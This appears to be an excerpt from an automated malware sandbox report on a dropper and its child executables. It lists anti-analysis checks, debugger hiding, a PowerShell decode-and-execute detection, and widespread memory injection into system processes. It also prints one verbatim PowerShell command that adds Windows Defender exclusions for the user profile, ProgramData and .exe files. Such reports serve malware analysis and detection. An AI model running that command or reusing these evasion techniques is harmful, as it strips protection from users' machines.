Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6016	Thread sleep count: 7372 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6016	Thread sleep time: -7372000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6016	Thread sleep count: 1610 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 6016	Thread sleep time: -1610000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3092	Thread sleep count: 8854 > 30
Source: C:\Windows\System32\svchost.exe TID: 3092	Thread sleep time: -8854000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3092	Thread sleep count: 735 > 30
Source: C:\Windows\System32\svchost.exe TID: 3092	Thread sleep time: -735000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F2DCE0 FindFirstFileExW,

14_2_0000028559F2DCE0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Source: skotes.exe, skotes.exe, 00000003.00000002.78404530812.0000000000450000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Ryu8yUx.exe, 0000000D.00000002.79065649033.000000000150F000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: Mc3FDUMnVz.exe, 00000000.00000002.78378024015.0000000001190000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.78392293924.0000000000450000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.78404530812.0000000000450000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: lsass.exe, 00000039.00000000.79032895053.0000026AB4E13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

graph_47-477

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Process queried: DebugPort
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Process queried: DebugObjectHandle
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Code function: 0_2_04D40C8F rdtsc

0_2_04D40C8F

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Code function: 13_2_004431A0 LdrInitializeThunk,

13_2_004431A0

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_0000028559F2D2A4

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02B790E1 mov edi, dword ptr fs:[00000030h]		12_2_02B790E1
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 12_2_02B7925E mov edi, dword ptr fs:[00000030h]		12_2_02B7925E

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F21268 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,

14_2_0000028559F21268

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Process token adjusted: Debug

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		14_2_0000028559F2D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000028559F27D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		14_2_0000028559F27D90

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi32_5080.amsi.csv, type: OTHER
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\tYliuwV[1].ps1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1, type: DROPPED

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 20E8FA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 26AB5E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 206DF360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 194DEAB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 156CB0E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB419A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 223389C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2790E940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26823210000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 20A72460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25E7D550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20ACF3B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 292067A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CABD5B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 25A301A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1F7B8460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C680BA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24132C70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2268A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D8FCA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19AE6140000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B014100000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20F951A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203807B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2CA9DAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1689C5D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F2DF1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C41A000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17A5B3B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1810BEE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21223F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E6C0450000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2069B4F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23614180000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B160CA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2CF47BA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 129874A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2095DE80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 140522E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 186835B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 22A472B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 204DA710000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 207C2110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2607AF00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 179C7BA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 24897EE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22C945A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: 12B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C5899C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 18777E80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C51FC00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27A20940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1C37A930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: C40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 1CACBE80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D7DB700000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FE81D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 226DDF60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\SettingSyncHost.exe base: 1F061FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 232A8500000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EFC4010000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 850000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 285BFF90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B840A80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 14947DE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 12619020000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1AE52AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1C91BC20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FA1FC50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1817F790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B2FE700000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1750EDC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2CF98D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AF70FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2322DD90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D6B2210000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1ED589B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 12B0AF80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2910F680000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E202150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 284015A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28559EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 23ED0700000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1A52A120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FA08C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 19F80AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD430000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2A4D4710000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1D780110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1D780460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 2AE983C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 17B534D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E709590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E7095F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 28CB5690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 260B9AD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 260B9F20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 217D6840000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 217D68A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1B6D7450000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 28C0D0C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1C916E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1C9174B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1F5AE890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 27FFEF20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E86D150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1E86D900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1B3EE9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1B3EEA20000 protect: page execute and read and write
